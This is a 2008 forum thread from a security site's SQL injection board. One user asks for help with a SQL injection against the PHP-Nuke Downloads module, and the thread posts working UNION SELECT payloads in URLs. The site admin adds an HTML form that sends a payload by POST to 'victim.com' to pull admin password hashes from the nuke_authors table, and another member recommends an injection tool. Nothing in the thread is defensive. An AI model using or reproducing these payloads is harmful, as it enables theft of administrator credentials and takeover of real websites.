 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
PHP-NUKE SQL injection problem ? |
 |
 Posted: Sun Apr 20, 2008 5:56 pm |
 |
|
| kr0k0 |
| Advanced user |
 |
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
 |
|
 |
|
Hi waraxe , i need help please for this exploit ,
| Code: | | /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=522+union/**/all/**/select+99999999999999,222,33+nuke_authors-- |
9999999999999
but whene i want to read column 'aid' or 'pwd' , does not wotking
| Code: | | /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=522+union/**/all/**/select+pwd,222,33+nuke_authors-- |
error Mysql ...
| Code: | | /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=522+union/**/all/**/select+convert(pwd),222,33+nuke_authors-- |
The html tags you attempted to use are not allowed
so ?? waraxe i need help please  |
|
|
|
|
| Posted: Sun Apr 20, 2008 6:48 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You can't use "(" and ")" in phpnuke with GET request method. Use POST method instead  |
|
|
|
|
| Posted: Sun Apr 20, 2008 7:56 pm |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
so how i can Use POST method ? in PHP-NUKe
waraxe plz ..  |
|
|
|
|
| Posted: Sun Apr 20, 2008 8:40 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| kr0k0 wrote: | so how i can Use POST method ? in PHP-NUKe
waraxe plz .. |
You know html?
<form action= "http://victim.com/modules.php?name=Downloads" method="POST">
<input type="hidden" name="d_op" value="viewdownloaddetails">
<input type="hidden" name="lid" value="-1 UNION ALL SELECT UNHEX(HEX(pwd)),2,3 FROM nuke_authors-- ">
<input type="submit" name="axe" "value="Test!">
</form>
Something like that |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 21, 2008 5:11 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| waraxe wrote: | | kr0k0 wrote: | so how i can Use POST method ? in PHP-NUKe
waraxe plz .. |
You know html?
<form action= "http://victim.com/modules.php?name=Downloads" method="POST">
<input type="hidden" name="d_op" value="viewdownloaddetails">
<input type="hidden" name="lid" value="-1 UNION ALL SELECT UNHEX(HEX(pwd)),2,3 FROM nuke_authors-- ">
<input type="submit" name="axe" "value="Test!">
</form>
Something like that |
...or use some program like Hephaestus's Ashen Spear by Wolfman. |
|
|
|
|
| Posted: Tue Apr 22, 2008 11:37 am |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| koko wrote: |
...or use some program like Hephaestus's Ashen Spear by Wolfman. |
THankx waraxe and Koko , but the link of soft , not work ,
if u have the soft , send me plz [ like ] ..
| Code: | http://wolfman.deny.de/tools.html
http://wolfman.deny.de/HAS.php |
|
|
|
|
|
| Posted: Tue Apr 22, 2008 3:11 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 70
Members: 0
Total: 70
